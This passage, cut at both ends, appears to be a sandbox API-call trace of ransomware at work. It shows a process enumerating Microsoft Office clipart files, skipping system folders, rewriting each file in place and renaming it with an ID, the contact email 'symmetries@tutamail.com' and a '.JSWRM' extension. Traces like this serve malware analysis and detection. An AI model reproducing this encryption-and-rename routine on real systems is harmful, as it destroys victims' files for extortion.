dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x960) returned 0x23fc98 [0076.380] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x960, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x960, lpOverlapped=0x0) returned 1 [0076.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.383] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x960, lpOverlapped=0x0) returned 1 [0076.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.383] CloseHandle (hObject=0x314) returned 1 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0076.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0076.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.383] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.384] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01171_.WMF", cAlternateFileName="")) returned 1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2=".") returned 1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="..") returned 1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="...") returned 1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="windows") returned -1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="recovery") returned -1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="perflogs") returned -1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="documents and settings") returned -1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="system volume information") returned -1 [0076.384] lstrcmpiW (lpString1="DD01171_.WMF", lpString2="msocache") returned -1 [0076.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01171_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01171_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01171_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0076.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01171_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01171_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01171_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0076.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.385] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2052) returned 1 [0076.385] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x800) returned 0x23fc98 [0076.385] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x800, lpOverlapped=0x0) returned 1 [0076.387] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.387] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x800, lpOverlapped=0x0) returned 1 [0076.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.387] CloseHandle (hObject=0x314) returned 1 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0076.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0076.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0076.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.388] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01171_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01171_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0076.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.388] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01172_.WMF", cAlternateFileName="")) returned 1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2=".") returned 1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="..") returned 1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="...") returned 1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="windows") returned -1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="recovery") returned -1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="perflogs") returned -1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="documents and settings") returned -1 [0076.388] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.389] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="system volume information") returned -1 [0076.389] lstrcmpiW (lpString1="DD01172_.WMF", lpString2="msocache") returned -1 [0076.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01172_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0076.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01172_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.389] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2232) returned 1 [0076.389] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8b0) returned 0x23fc98 [0076.389] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x8b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x8b0, lpOverlapped=0x0) returned 1 [0076.391] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.391] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x8b0, lpOverlapped=0x0) returned 1 [0076.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.391] CloseHandle (hObject=0x314) returned 1 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0076.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0076.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0076.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0076.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.391] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01172_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01172_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0076.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.392] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x70c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01173_.WMF", cAlternateFileName="")) returned 1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2=".") returned 1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="..") returned 1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="...") returned 1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="windows") returned -1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="recovery") returned -1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="perflogs") returned -1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="documents and settings") returned -1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="system volume information") returned -1 [0076.392] lstrcmpiW (lpString1="DD01173_.WMF", lpString2="msocache") returned -1 [0076.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01173_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0076.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01173_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01173_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01173_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0076.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.395] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1804) returned 1 [0076.395] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x700) returned 0x23fc98 [0076.395] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x700, lpOverlapped=0x0) returned 1 [0076.397] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.397] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x700, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x700, lpOverlapped=0x0) returned 1 [0076.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.397] CloseHandle (hObject=0x314) returned 1 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 